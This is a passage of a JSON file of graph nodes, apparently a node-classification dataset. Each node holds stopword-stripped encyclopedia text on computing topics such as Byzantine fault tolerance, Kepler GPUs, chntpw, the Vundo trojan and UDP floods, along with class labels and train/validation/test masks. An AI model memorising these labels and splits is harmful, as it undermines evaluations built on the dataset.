proving 3 n +1 necessary sufficient results together later proof leslie lamport sufficiency 3 n using digital signatures published seminal paper reaching agreement presence faults authors awarded 2005 edsger w. dijkstra prize paper make interactive consistency problem easier understand lamport devised colorful allegory group army generals formulate plan attacking city original version story cast generals commanders albanian army name changed eventually settling byzantine suggestion jack goldberg future-proof potential offense giving formulation problem together additional results presented authors 1982 paper byzantine generals problem simplest form generals must decide whether attack retreat generals may prefer attack others prefer retreat important thing every general agrees common decision halfhearted attack generals would become rout would worse either coordinated attack coordinated retreat problem complicated presence treacherous generals may cast vote suboptimal strategy may selectively instance nine generals voting four support attacking four others favor retreat ninth general may send vote retreat generals favor retreat vote attack rest received retreat vote ninth general retreat rest attack may go well attackers problem complicated generals physically separated send votes via messengers may fail deliver votes may forge false votes byzantine fault tolerance achieved loyal non-faulty generals majority agreement strategy default vote value given missing messages example missing messages given value null agreement null votes majority pre-assigned default strategy used e.g. retreat typical mapping story onto computer systems computers generals digital communication system links messengers although problem formulated analogy decision-making security problem electronics solved simply cryptographic digital signatures failures incorrect voltages propagate encryption process thus component may appear functioning one component faulty another prevents forming consensus whether component faulty several examples byzantine failures occurred given two equivalent journal papers examples described nasa dashlink web pages web pages also describe phenomenology cause byzantine faults byzantine errors observed infrequently irregular points endurance testing newly constructed virginia class submarines least 2005 issues publicly reported several solutions described lamport shostak pease 1982 began noting generals problem reduced solving commander lieutenants problem loyal lieutenants must act unison action must correspond commander ordered case commander loyal several system architectures designed c. 1980 implemented byzantine fault tolerance include draper ftmp honeywell mmfcs sri sift 1999 miguel castro barbara liskov introduced practical byzantine fault tolerance pbft algorithm provides high-performance byzantine state machine replication processing thousands requests per second sub-millisecond increases latency pbft several bft protocols introduced improve robustness performance instance q/u hq zyzzyva abstracts addressed performance cost issues whereas protocols like aardvark rbft addressed robustness issues furthermore adapt tried make use existing bft protocols switching adaptive way improve system robustness performance underlying conditions change furthermore bft protocols introduced leverage trusted components reduce number replicas e.g. a2m-pbft-ea minbft one example bft use bitcoin peer-to-peer digital cash system bitcoin network works parallel generate blockchain proof-of-work allowing system overcome byzantine failures reach coherent global view system state aircraft systems boeing 777 aircraft information management system via arinc 659 safebus network boeing 777 flight control system boeing 787 flight control systems use byzantine fault tolerance real-time systems byzantine fault tolerance solutions must low latency example safebus achieve byzantine fault tolerance within order microsecond added latency spacecraft flight systems spacex dragon consider byzantine fault tolerance design byzantine fault tolerance mechanisms use components repeat incoming message signature recipients incoming message mechanisms make assumption act repeating message blocks propagation byzantine symptoms systems high degree safety security criticality assumptions must proven true acceptable level fault coverage providing proof testing one difficulty creating sufficiently wide range signals byzantine symptoms testing likely require specialized fault injectors",
    "neighbors": [
      9248,
      8674,
      70,
      8671,
      7499,
      3982,
      9753,
      4817,
      7315,
      11379,
      10102,
      8025,
      121,
      11612,
      1087
    ],
    "mask": "None"
  },
  {
    "node_id": 7086,
    "label": 3,
    "text": "Kepler_(microarchitecture):kepler microarchitecture kepler codename gpu microarchitecture developed nvidia first introduced retail april 2012 successor fermi microarchitecture kepler nvidia first microarchitecture focus energy efficiency geforce 600 series geforce 700 series geforce 800m series gpus based kepler manufactured 28 nm kepler also found use gk20a gpu component tegra k1 soc well quadro kxxx series quadro nvs 510 nvidia tesla computing modules kepler followed maxwell microarchitecture used alongside maxwell geforce 700 series geforce 800m series architecture named johannes kepler german mathematician key figure 17th century scientific revolution goal nvidia previous architecture design focused increasing performance compute tessellation kepler architecture nvidia targeted focus efficiency programmability performance efficiency aim achieved use unified gpu clock simplified static scheduling instruction higher emphasis performance per watt abandoning shader clock found previous gpu designs efficiency increased even though requires additional cores achieve higher levels performance cores power-friendly two kepler cores using 90 power one fermi core according nvidia numbers also change unified gpu clock scheme delivers 50 reduction power consumption area programmability aim achieved kepler hyper-q dynamic parallelism multiple new compute capabilities 3.x functionality higher gpu utilization simplified code management achievable gk gpus thus enabling flexibility programming kepler gpus finally performance aim additional execution resource cuda core register cache kepler ability achieve memory clock speed 6 ghz increases kepler performance compare previous nvidia gpus gk series gpu contains features older fermi newer kepler generations kepler based members add following standard features kepler architecture employs new streaming multiprocessor architecture called smx smxs reason kepler power efficiency whole gpu uses single unified clock speed although smxs usage single unified clock increases power efficiency due fact multiple lower clock kepler cuda cores consume 90 less power multiple higher clock fermi cuda core additional processing units needed execute whole warp per cycle doubling 16 32 per cuda array solve warp execution problem smx front-end also double warp schedulers dispatch unit register file doubled 64k entries feed additional execution units risk inflating die area smx polymorph engines enhanced 2.0 rather double alongside execution units enabling spurr polygon shorter cycles dedicated fp64 cuda cores also used kepler cuda cores fp64 capable save die space improvement nvidia made smx results include increase gpu performance efficiency gk110 48kb texture cache unlocked compute workloads compute workload texture cache becomes read-only data cache specializing unaligned memory access workloads furthermore error detection capabilities added make safer workloads rely ecc register per thread count also doubled gk110 255 registers per thread additional die spaces acquired replacing complex hardware scheduler simple software scheduler software scheduling warps scheduling moved nvidia compiler gpu math pipeline fixed latency introduced instruction-level parallelism addition thread level parallelism instructions statically scheduled consistency introduced moving fixed latency instructions static scheduled compiler removed level complexity gpu boost new feature roughly analogous turbo boosting cpu gpu always guaranteed run minimum clock speed referred base clock clock speed set level ensure gpu stays within tdp specifications even maximum loads loads lower however room clock speed increased without exceeding tdp scenarios gpu boost gradually increase clock speed steps gpu reaches predefined power target 170 w default taking approach gpu ramp clock dynamically providing maximum amount speed possible remaining within tdp specifications power target well size clock increase steps gpu take adjustable via third-party utilities provide means overclocking kepler-based cards nvidia fermi kepler gpus geforce 600 series support direct3d 11.0 specification nvidia originally stated kepler architecture full directx 11.1 support includes direct3d 11.1 path following modern ui direct3d 11.1 features however supported ref name= nvidia/d3d11.1 /ref according definition microsoft direct3d feature level 11_1 must complete otherwise direct3d 11.1 path executed integrated direct3d features kepler architecture geforce 400 series fermi architecture nvidia kepler gpus geforce 600/700 series support direct3d 12 feature level 11_0 exclusive kepler gpus txaa new anti-aliasing method nvidia designed direct implementation game engines txaa based msaa technique custom resolve filters designed address key problem games known shimmering temporal aliasing txaa resolves smoothing scene motion making sure in-game scene cleared aliasing shimmering low level gk110 sees additional instructions operations improve performance new shuffle instructions allow threads within warp share data without going back memory making process much quicker previous load/share/store method atomic operations also overhauled speeding execution speed atomic operations adding fp64 operations previously available fp32 data hyper-q expands gk110 hardware work queues 1 32 significance single work queue meant fermi could occupied times n't enough work queue fill every sm 32 work queues gk110 many scenarios achieve higher utilization able put different task streams would otherwise idle smx simple nature hyper-q reinforced fact easily mapped mpi common message passing interface frequently used hpc legacy mpi-based algorithms originally designed multi-cpu systems became bottlenecked false dependencies solution increasing number mpi jobs possible utilize hyper-q algorithms improve efficiency without changing code dynamic parallelism ability kernels able dispatch kernels fermi cpu could dispatch kernel incurs certain amount overhead communicate back cpu giving kernels ability dispatch child kernels gk110 save time go back cpu process free cpu work tasks enabling dynamic parallelism requires new grid management dispatch control system new grid management unit gmu manages prioritizes grids executed gmu pause dispatch new grids queue pending suspended grids ready execute providing flexibility enable powerful runtimes dynamic parallelism cuda work distributor kepler holds grids ready dispatch able dispatch 32 active grids double capacity fermi cwd kepler cwd communicates gmu via bidirectional link allows gmu pause dispatch new grids hold pending suspended grids needed gmu also direct connection kepler smx units permit grids launch additional work gpu via dynamic parallelism send new work back gmu prioritized dispatched kernel dispatched additional workload pauses gmu hold inactive dependent work completed nvidia gpudirect capability enables gpus within single computer gpus different servers located across network directly exchange data without needing go cpu/system memory rdma feature gpudirect allows third party devices ssds nics ib adapters directly access memory multiple gpus within system significantly decreasing latency mpi send receive messages to/from gpu memory also reduces demands system memory bandwidth frees gpu dma engines use cuda tasks kepler gk110 also supports gpudirect features including peer‐to‐peer gpudirect video nvenc nvidia power efficient fixed-function encode able take codecs decode preprocess encode h.264-based content nvenc specification input formats limited h.264 output still nvenc limited format support 4096x4096 encode like intel quick sync nvenc currently exposed proprietary api though nvidia plans provide nvenc usage cuda theoretical single-precision processing power kepler gpu gflops computed 2 operations per fma instruction per cuda core per cycle × number cuda cores × core clock speed ghz note like previous generation fermi kepler able benefit increased processing power dual-issuing mad+mul like tesla capable theoretical double-precision processing power kepler gk110/210 gpu 1/3 single precision performance double-precision processing power however available professional quadro tesla high-end titan-branded geforce cards drivers consumer geforce cards limit performance 1/24 single precision performance lower performance gk10x chips similarly capped 1/24 single precision performance",
    "neighbors": [
      3585,
      3203,
      398,
      10512,
      9489,
      7833,
      1309,
      10658,
      2339,
      9774,
      9911,
      11322,
      5948,
      8514,
      7111,
      2635,
      10971,
      2525,
      9057,
      2277,
      8937,
      11630,
      1776,
      6900,
      2937,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 7087,
    "label": 2,
    "text": "Chntpw:chntpw chntpw software utility resetting blanking local passwords used windows nt 2000 xp vista 7 8 8.1 10 editing sam database windows stores password hashes two ways use program via standalone chntpw utility installed package available modern linux distributions e.g ubuntu via bootable cd/usb image also floppy release support dropped chntpw support fully encrypted ntfs partitions possible exceptions encrypted partitions readable linux e.g luks usernames containing unicode characters active directory passwords exception local users systems members ad domain password changing feature also n't fully functional either password blanking highly recommended fact latter versions windows possible option furthermore bootable image might problems controllers requiring 3rd party drivers cases use stand-alone program full-featured linux environment recommended codice_1 utility included many various linux distributions including ones focused security software 10th anniversary author changed license non-commercial one gnu general public license gpl version 2",
    "neighbors": [
      929,
      7754,
      7983,
      8976,
      823,
      8857,
      4154,
      5755,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7088,
    "label": 6,
    "text": "XCOPY:xcopy computing codice_1 command used ibm pc dos ms-dos ibm os/2 microsoft windows freedos reactos related operating systems copying multiple files entire directory trees one directory another copying files across network codice_1 stands extended copy created functional file copying utility codice_3 command found earlier operating systems codice_1 first appeared dos 3.2 still included windows 10 codice_1 deprecated favor codice_6 powerful copy tool built microsoft windows server desktop operating systems dr dos 6.0 includes implementation command freedos version developed rene ableidinger licensed gpl j. edmeades developed wine-compatible version included reactos licensed lgpl create new directory copying contents existing directory including files subdirectories hidden system attributes empty directories directory names include blank signs spaces names put quotation marks copy entire drive mapped network drive ignoring errors network restartable mode copy single file without prompt file directory codice_1 fails insufficient memory error path plus filename longer 254 characters moving large files without /j option available server 2008r2 consume available ram system codice_1 copy open files process may open files exclusive read access withholding file_share_read https //msdn.microsoft.com/en-us/library/aa363858.aspx windows volume shadow copy service used situations codice_1 use therefore codice_1 useful backing live operating system volumes",
    "neighbors": [
      2432,
      3970,
      8834,
      6148,
      10631,
      2568,
      6281,
      6797,
      3856,
      6674,
      4248,
      8729,
      4001,
      4771,
      292,
      7847,
      808,
      7983,
      10033,
      178,
      9780,
      1978,
      7356,
      5437,
      7486,
      10428,
      960,
      8517,
      1741,
      4174,
      9166,
      1750,
      9946,
      1632,
      10727,
      6506,
      9709,
      1647,
      9839,
      2545,
      4850,
      7411,
      8692,
      10101,
      11249,
      10489,
      3323,
      6396
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7089,
    "label": 4,
    "text": "Credant_Technologies:credant technologies credant technologies company located addison texas offering products services data security company founded 2001 bob heard chris burchett andrew kahl company offers range products protect data leaking several different versions main technology used different locations network via policy proxy border lan internet dmz central enterprise server within network also editions exchange servers domain controllers available products self-encrypting drivers encrypt data drive without additional requirements client user bitlocker management systems policy reporting tools company claims products protect two million end-points several industries universities health-care aeronautical financial government/defense 18 december 2012 dell announced reached agreement credant would acquire company prior acquisition dell already technology partner credant dell bought 16 companies past 4 years several directly indirectly field data-security major step field security services made dell start 2011 acquired secureworks 2012 acquisition sonicwall best known firewalls intrusion detection prevention appliances also companies dell bought past years offer products services security including perot systems quest software acquisition credant dell gambles continuation strong growth security services",
    "neighbors": [
      8998,
      5608,
      11146,
      8022,
      1400,
      5245
    ],
    "mask": "Test"
  },
  {
    "node_id": 7090,
    "label": 4,
    "text": "National_Industrial_Security_Program:national industrial security program national industrial security program nisp nominal authority united states managing needs private industry access classified information nisp established 1993 executive order 12829 national security council nominally sets policy nisp director information security oversight office nominally authority implementation isoo secretary defense nominally executive agent nisp recognizes four different cognizant security agencies equal authority department defense department energy central intelligence agency nuclear regulatory commission major component nisp nisp operating manual also called nispom dod 5220.22-m nispom establishes standard procedures requirements government contractors regards classified information current nispom edition dated 28 feb 2006 chapters selected sections edition dod 5220.22-m sometimes cited standard sanitization counter data remanence nispom actually covers entire field government–industrial security data sanitization small part two paragraphs 141-page document furthermore nispom actually specify particular method standards sanitization left cognizant security authority defense security service provides clearing sanitization matrix c sm specify methods june 2007 edition dss c sm overwriting longer acceptable sanitization magnetic media degaussing physical destruction acceptable",
    "neighbors": [
      1475,
      3972,
      8997,
      2534,
      7527,
      11368,
      7369,
      11695,
      7090,
      9086,
      10195,
      6494,
      831
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7091,
    "label": 4,
    "text": "Resource_exhaustion_attack:resource exhaustion attack resource exhaustion attacks computer security exploits crash hang otherwise interfere targeted program system form denial-of-service attack different distributed denial-of-service attacks involve overwhelming network host web server requests many locations resource exhaustion attacks generally exploit software bug design deficiency software manual memory management commonly written c c++ memory leaks common bug exploited resource exhaustion even garbage collected programming language used resource exhaustion attacks possible program uses memory inefficiently impose limits amount state used necessary file descriptor leaks another common vector general-purpose programming languages require programmer explicitly close file descriptors even particularly high-level languages allow programmer make mistakes",
    "neighbors": [
      2304,
      2754,
      8930,
      8679,
      2409,
      6735,
      3473,
      11351,
      953,
      6813,
      2558,
      3871
    ],
    "mask": "Test"
  },
  {
    "node_id": 7092,
    "label": 7,
    "text": "CallFire:callfire callfire inc. cloud telephony services provider saas headquartered santa monica california known locally silicon beach callfire develops web-based voip products services business-to-business b2b service small medium-sized businesses smb company incorporated 2004 dinesh ravishanker vijesh mehta komnieve singh punit shah tj thinakaran came board 2006 2007 respectively round founding team dan retzlaff james nguyen shane neman hired initial years ronald burr hired spring 2012 company provides cloud communication services voice broadcasting power dialing interactive voice response 2010 callfire ranked 285 inc. magazine ’ 29th annual list america ’ fastest growing private companies callfire ranked 15 within telecommunications industry los angeles metropolitan region much callfire ’ annual growth attributed “ growth calls use service u.s. elections well hurricane sandy ”",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 7093,
    "label": 3,
    "text": "ARCS_(computing):arcs computing arcs firmware bootloader also known prom console used computers produced sgi since beginning 1990s arcs system loosely compliant advanced risc computing arc standard promulgated advanced computing environment consortium early 1990s another sense arc standard based sgi arcs used basis generating arc standard although arc calls little-endian system arcs system big-endian mips-based systems despite various inconsistencies two sgi arcs implementations arc standard share many commonalities device naming calling conventions etc. computers use arcs firmware based mips line microprocessors sgi visual workstation series based intel pentium iii also uses arcs visual workstation series commercially produced x86-compatible system used arcs firmware rather traditional pc bios used intel 386-lineage machines list product lines use arcs console includes",
    "neighbors": [
      7234,
      10051,
      6247,
      1515,
      6252,
      7311,
      6256,
      7983,
      499,
      5076,
      2452,
      221,
      6942
    ],
    "mask": "Test"
  },
  {
    "node_id": 7094,
    "label": 5,
    "text": "Metro_Ring_Protocol:metro ring protocol metro ring protocol mrp layer 2 resilience protocol developed foundry networks currently delivered products manufactured brocade communications systems hewlett packard protocol quite tightly specifies topology layer 2 devices usually core larger network configured able achieve much faster failover times layer 2 protocols spanning tree",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 7095,
    "label": 5,
    "text": "Roger_Wilco_(software):roger wilco software roger wilco one first voice-over-ip client programs designed primarily use online multiplayer video games roger wilco enabled online gamers talk one another computer headset audio input device instead typing messages within year software introduction 2 million online video gamers flocked application roger wilco procedure words radiophone communication mean understood message comply roger wilco developed us startup company called resounding technology three company four founders roommates undergraduate students princeton university adam frankl tony lovell henri de marcellus david lewis led marketing business development based silicon valley responsible growing roger wilco community managed partnerships video game publishers bundled roger wilco games plantronics pny game peripheral manufacturers also bundled roger wilco products company began publishing pre-release versions software autumn 1998 first general availability release roger wilco mark followed may 1999 company distributed client server freeware server software roger wilco base station developed linux freebsd windows 9x windows nt development client mac os never progressed beyond alpha phase david lewis demonstrated product server-less voice capabilities mpath interactive startup company silicon valley went acquire resounding technology based proprietary peer-to-peer voice technology company ipo 'd soon renamed hearme inc december 2000 gamespy bought roger wilco intellectual property early 2001 integrated updated version client software game server browser gamespy arcade players could use roger wilco software bought subscription gamespy game tools suite david lewis licensed sdk versions voice technology virtually every major game publisher including activision ea microsoft ubisoft others licensing arrangement microsoft enabled use voice sdk microsoft xbox required multi-player xbox game developers included in-game voice chat capabilities today virtually every leading online multiplayer game includes voicechat due pioneering efforts resounding team gamespy published final version roger wilco client windows july 8 2003 year vice president consumer products gamespy industries told boston globe roger wilco 5 million users",
    "neighbors": [
      576,
      4490,
      7983,
      8976,
      499,
      823,
      1754
    ],
    "mask": "None"
  },
  {
    "node_id": 7096,
    "label": 4,
    "text": "Lookout_(IT_security):lookout security lookout private security company headquartered san francisco california develops markets cloud-based security software mobile devices company founded 2007 three security researchers previously consulting name flexilis years raised 300 million venture capital funding lookout also expanded consumer android app mobile devices operating systems business version lookout founded three security researchers met university southern california los angeles students formed consulting firm focused cybersecurity called flexilis 2003 2004 discovered vulnerability nokia phones allowed take control phones remotely bluetooth founders could n't get nokia patch vulnerability scanned data nokia phones 2005 academy awards using high-powered bluetooth device publicity stunt exposing security vulnerabilities private phones celebrities led widespread media attention nokia soon fixed problem 2007 flexilis began developing mobile security app raised 5.5 million venture capital 2009 flexilis changed name lookout 11 million venture capital funding raised 2010 followed 40 million 2011 75 million 2012 55 million 2013 series f funding round 2014 raised another 150 million funding 2014 co-founder john hering stepped ceo former juniper networks executive jim dolce appointed position 2017 lookout citizen lab discovered malicious app called pegasus made israeli-firm nso group iphone android versions posed ordinary apps took control phone downloaded following year lookout electronic frontier foundation published report exposing series similar hacking campaigns lebanese government called dark caracal lookout develops markets security app mobile phones also called lookout free version includes antivirus antimalware scans locator features free version comes pre-installed android devices sold t-mobile sprint paid versions add ability remotely lock wipe phone backup photos features enterprise version adds analytics admin console tools detect malicious software corporate networks first free version lookout introduced december 2009 first paid version introduced following year safe browsing browser add-on added 2011 2012 version 3 lookout overhauled user interface added signal flare documents phone location runs battery following year lookout added feature secretly takes photo someone tries unlock phone unsuccessfully order catch thieves first business version added features administrators introduced 2013 followed first enterprise version june 2015",
    "neighbors": [
      6186,
      8172,
      2542
    ],
    "mask": "Test"
  },
  {
    "node_id": 7097,
    "label": 2,
    "text": "Intel_Advisor:intel advisor intel advisor also known advisor xe vectorization advisor threading advisor simd vectorization optimization shared memory threading assistance tool c c++ c fortran software developers architects product available windows linux operating systems form standalone gui tool microsoft visual studio plug-in command line interface also supporting usage mpi intel advisor incorporates two workflows two feature-sets vectorization advisor threading advisor vectorization advisor supports analysis scalar sse avx avx2 avx-512-enabled codes generated intel gnu microsoft compilers auto-vectorization also supports analysis explicitly vectorized codes use openmp 4.x intel cilk plus well codes written using c vector intrinsics assembly language intel advisor includes following main features vectorization advisor capability introduced 2016 release intel advisor works compilers gcc microsoft provide additional information used intel compilers version 15.x newer examples include vectorize vector efficiency metrics intel advisor available part intel parallel studio xe vectorization advisor part intel advisor 2016 supports native analysis 2nd generation intel® xeon phi™ codenamed knights landing processor starting intel advisor 2016 update 3 version advisor survey map analysis several avx-512-specific tuning capabilities advisor also separate capability analysis non-executed code paths analyze avx-512 code characteristics running analysis platforms n't support avx-512 intel advisor automates roofline performance model first proposed berkeley extended university lisbon advisor roofline analysis helps identify given loop/function memory cpu bound also identifies optimized loops high impact performance optimized public sources known used schlumberger sandia national lab well leading design company classified great timesaver incredibly useful tool supporting parallel algorithm research advisor also aims simplify speed-up parallel design implementation providing step-by-step workflow claimed useful academia educational purposes public sources new vectorization advisor capabilities introduced august 2015 known used lrz ichec daresbury lab pexip prototype threading designs software architects add code annotations describe threading understood advisor ignored compiler advisor projects scalability threading checks synchronization errors threading suitability projections intel xeon phi beginning 2015 release suitability analysis supported first generation intel xeon phi™ coprocessor knights corner threading performance scalability parallel runtimes overheads modeling suitability estimates intel® xeon phi™ processor peak performance given loop/workload automatically compares appropriate double-socket 16-core intel® xeon® reference performance baseline",
    "neighbors": [
      833,
      2821,
      9095,
      6184,
      8680,
      779,
      7983,
      8126,
      823,
      3162,
      1916,
      477,
      3962
    ],
    "mask": "Test"
  },
  {
    "node_id": 7098,
    "label": 4,
    "text": "Vundo:vundo vundo trojan commonly known vundo virtumonde virtumondo sometimes referred ms juan either trojan horse computer worm known cause popups advertising rogue antispyware programs sporadically misbehavior including performance degradation denial service websites including google facebook also used deliver malware host computers later versions include rootkits ransomware vundo infection typically caused either opening e-mail attachment carrying trojan variety browser exploits including vulnerabilities popular browser plug-ins java many popups advertise fraudulent programs antispywaremaster winfixer antivirus 2009. codice_1 consists two main components browser helper objects class id components windows registry hkey local machine file names dynamic attaches system using bogus browser helper objects dll files attached winlogon.exe explorer.exe recently lsass.exe vundo inserts registry entries suppress windows warnings disabling firewall antivirus automatic updates service disables automatic updates service quickly re-disables manually re-enabled attacks malwarebytes anti-malware spybot search destroy lavasoft ad-aware hijackthis several malware removal tools frequently hides vundofix combofix rather pushing fake antivirus products new ad popups drive download attacks copies ads major corporations faked simply closing allows drive-by download exploit insert payload user computer since many different varieties vundo trojans symptoms vundo vary widely ranging relatively benign severe almost varieties vundo feature sort pop-up advertising well rooting make difficult delete computers infected exhibit following symptoms",
    "neighbors": [
      10756,
      9746,
      4374,
      3351,
      6938,
      3867,
      2213,
      5677,
      1970,
      2611,
      9791,
      3394,
      4165,
      9569,
      3555,
      877,
      6643,
      7413,
      2041
    ],
    "mask": "None"
  },
  {
    "node_id": 7099,
    "label": 3,
    "text": "INT_16H:int 16h int 16h int 16h int 22 shorthand bios interrupt call 16hex 22nd interrupt vector x86-based computer system bios typically sets real mode interrupt handler vector provides keyboard services interruption responsible control pc keyboard interruption responsible obtaining basic keyboard functionality i.e responsible collecting keystrokes obtain status buffer keyboard etc standard encoding keyboard offers int 16 h us keyboard adapt coding int 16h another type keyboard example hebrew keyboard must attend scan-code key pressed perform suitable interpreting key want 101 letters keyboard keys int 16h interprets expanded keys scan-code different normal keys e.g. key pause",
    "neighbors": [
      1408,
      5312
    ],
    "mask": "Test"
  },
  {
    "node_id": 7100,
    "label": 1,
    "text": "JDBC_driver:jdbc driver jdbc driver software component enabling java application interact database jdbc drivers analogous odbc drivers ado.net data providers ole db providers connect individual databases jdbc java database connectivity api requires drivers database jdbc driver gives connection database implements protocol transferring query result client database jdbc technology drivers fit one four categories jdbc type 1 driver also known jdbc-odbc bridge database driver implementation employs odbc driver connect database driver converts jdbc method calls odbc function calls driver platform-dependent makes use odbc turn depends native libraries underlying operating system jvm running upon also use driver leads installation dependencies example odbc must installed computer driver database must support odbc driver use driver discouraged alternative pure-java driver available implication application using type 1 driver non-portable given binding driver platform technology n't suitable high-transaction environment type 1 drivers also n't support complete java command set limited functionality odbc driver sun oracle provided jdbc-odbc bridge driver codice_1 driver native code java closed source sun's/oracle jdbc-odbc bridge removed java 8 vendors available driver written loading causes instance created also calls codice_2 instance parameter drivermanager list drivers available creating connection may sometimes case one jdbc driver capable connecting given url example connecting given remote database might possible use jdbc-odbc bridge driver jdbc-to-generic-network-protocol driver driver supplied database vendor cases order drivers tested significant drivermanager use first driver finds successfully connect given url first drivermanager tries use driver order registered drivers listed jdbc.drivers always registered first skip drivers untrusted code unless loaded source code trying open connection tests drivers calling method driver.connect one turn passing url user originally passed method codice_3 first driver recognizes url makes connection jdbc type 2 driver also known native-api driver database driver implementation uses client-side libraries database driver converts jdbc method calls native calls database api example oracle oci driver type 2 driver jdbc type 3 driver also known pure java driver database middleware database driver implementation makes use middle tier calling program database middle-tier application server converts jdbc calls directly indirectly vendor-specific database protocol differs type 4 driver protocol conversion logic resides client middle-tier like type 4 drivers type 3 driver written entirely java client-side jdbc driver may used multiple databases depends number databases middleware configured support type 3 driver platform-independent platform-related differences taken care middleware also making use middleware provides additional advantages security firewall access jdbc type 4 driver also known direct database pure java driver database driver implementation converts jdbc calls directly vendor-specific database protocol written completely java type 4 drivers thus platform independent install inside java virtual machine client provides better performance type 1 type 2 drivers overhead conversion calls odbc database api calls unlike type 3 drivers need associated software work database protocol vendor specific jdbc client requires separate drivers usually vendor supplied connect different types databases",
    "neighbors": [
      9471,
      9348,
      7175,
      4490,
      5677,
      7983,
      9263,
      9234,
      2901,
      9144,
      8122,
      6015
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7101,
    "label": 2,
    "text": "Crash_reporter:crash reporter crash reporter usually system software whose function identify reporting crash details alert crashes production development testing environments crash reports often include data stack traces type crash trends version software reports help software developers- web saas mobile apps diagnose fix underlying problem causing crashes crash reports may contain sensitive information passwords email addresses contact information become objects interest researchers field computer security implementing crash reporting tools part development cycle become standard crash reporting tools become commodity many offered free like crashlytics many giant industry players part software development eco-system entered game companies twitter google others putting lot efforts encouraging software developers use apis knowing increase revenues road advertisements mechanisms realize must offer elegant solutions many possible development issues otherwise competitors take actions keep adding advanced features crash reporting tools make important development functionality giant companies include portfolio solutions many crash reporting tools specialized mobile app many sdks macos standard crash reporter /system/library/coreservices/crash reporter.app crash reporter.app sends unix crash logs apple engineers look top text field window crash log bottom field user comments users may also copy paste log email client send application vendor use crash reporter.app 3 main modes display nothing crash display application crashed dialog box display crash report window microsoft windows includes crash reporting service called windows error reporting prompts users send crash reports microsoft online analysis information goes central database run microsoft consists diagnostic information helps company development team responsible crash debug resolve issue choose crash reports third party software available third party developers granted access microsoft system considers parts debug release process targeted bug fixes applied windows update words people experiencing particular type crash offered bug fix thus limiting exposure issue according der spiegel microsoft crash reporter exploited nsa tailored access operations tao unit hack computers mexico secretariat public security according source microsoft crash reports automatically harvested nsa xkeyscore database order facilitate operations another error reporting library windows crashrpt crashrpt library light-weight open source error handling framework applications created microsoft visual c++ running windows library distributed new bsd license crashrpt intercepts unhandled exceptions creates crash minidump file builds crash descriptor xml format presents interface allow user review crash report finally compresses sends crash report software support team crashrpt also provides server-side command line tool crash report analysis named crprober tool able read received crash reports directory generate summary file text format crash report also groups similar crash reports making easier determine popular problems crprober tool provide graphical interface rather cryptic difficult use also open-source server software named crashfix server store organize analyze crash reports sent crashrpt library group similar crash reports built-in bug tracker generate statistical reports crashfix server provides web-based user interface making possible several project members collaborate upload debugging symbols browse crash reports associate bugs crash reports abrt automated bug reporting tool claimed distro-independent deployed fedora red hat enterprise linux distributions abrt intercepts core dumps applications user-confirmation sends bug reports various bug-tracking systems fedora bugzilla ubuntu hosts public error tracker errors.ubuntu.com collects hundreds thousands error reports daily millions machines program crashes ubuntu crash handler apport notify user offer report crash user chooses report crash details possibly including core dump uploaded ubuntu server daisy.ubuntu.com analysis core dump automatically processed create stack trace crash signature crash signature used classify subsequent crash reports caused error bug buddy crash reporting tool used gnome platform application using gnome libraries crashes bug buddy generates stack trace using gdb invites user submit report gnome bugzilla user add comments view details crash report crash reporting tool used kde called dr. konqi user also get backtrace using gdb talkback also known quality feedback agent crash reporter used mozilla software version 1.8.1 report crashes products centralized server aggregation case-by-case analysis talkback proprietary software licensed mozilla corporation supportsoft mozilla product e.g mozilla firefox mozilla thunderbird crash talkback enabled talkback agent would appear prompting user provide optional information regarding crash talkback replace native os crash reporter enabled appear along talkback agent talkback replaced breakpad firefox since version 3 breakpad previously called airbag open-source replacement talkback developed google mozilla used current mozilla products firefox thunderbird significance first open source multi-platform crash reporting system since 2007 breakpad included firefox windows mac os x linux breakpad typically paired socorro receives classifies crashes users breakpad part crash reporting system includes reporting mechanism crashpad open-source crash reporter used google chromium developed replacement breakpad due update macos 10.10 removed api used breakpad crashpad currently consists crash-reporting client related tools macos windows considered substantially complete platforms crashpad became crash reporter client chromium macos march 2015 windows november 2015 world warcraft another program use crash reporter error reporter error reporter may detect crashes time sometimes os crash reporter invoked instead error reporter even known crash reporting errors android ios operating systems also built crash reporting functionality",
    "neighbors": [
      3371,
      6797,
      5492,
      5078,
      2262,
      8726,
      11418,
      637,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 7102,
    "label": 4,
    "text": "UDP_flood_attack:udp flood attack udp flood attack denial-of-service dos attack using user datagram protocol udp sessionless/connectionless computer networking protocol using udp denial-of-service attacks straightforward transmission control protocol tcp however udp flood attack initiated sending large number udp packets random ports remote host result distant host thus large number udp packets victimized system forced sending many icmp packets eventually leading unreachable clients attacker may also spoof ip address udp packets ensuring excessive icmp return packets reach anonymizing network location operating systems mitigate part attack limiting rate icmp responses sent udp flood attack tools attack managed deploying firewalls key points network filter unwanted network traffic potential victim never receives never responds malicious udp packets firewall stops however firewalls 'stateful i.e hold number sessions firewalls also susceptible flood attacks",
    "neighbors": [
      6080,
      2018,
      4163,
      3428,
      8998,
      10924,
      10651,
      11413,
      5402,
      2299,
      9727
    ],
    "mask": "Train"
  },
  {
    "node_id": 7103,
    "label": 4,
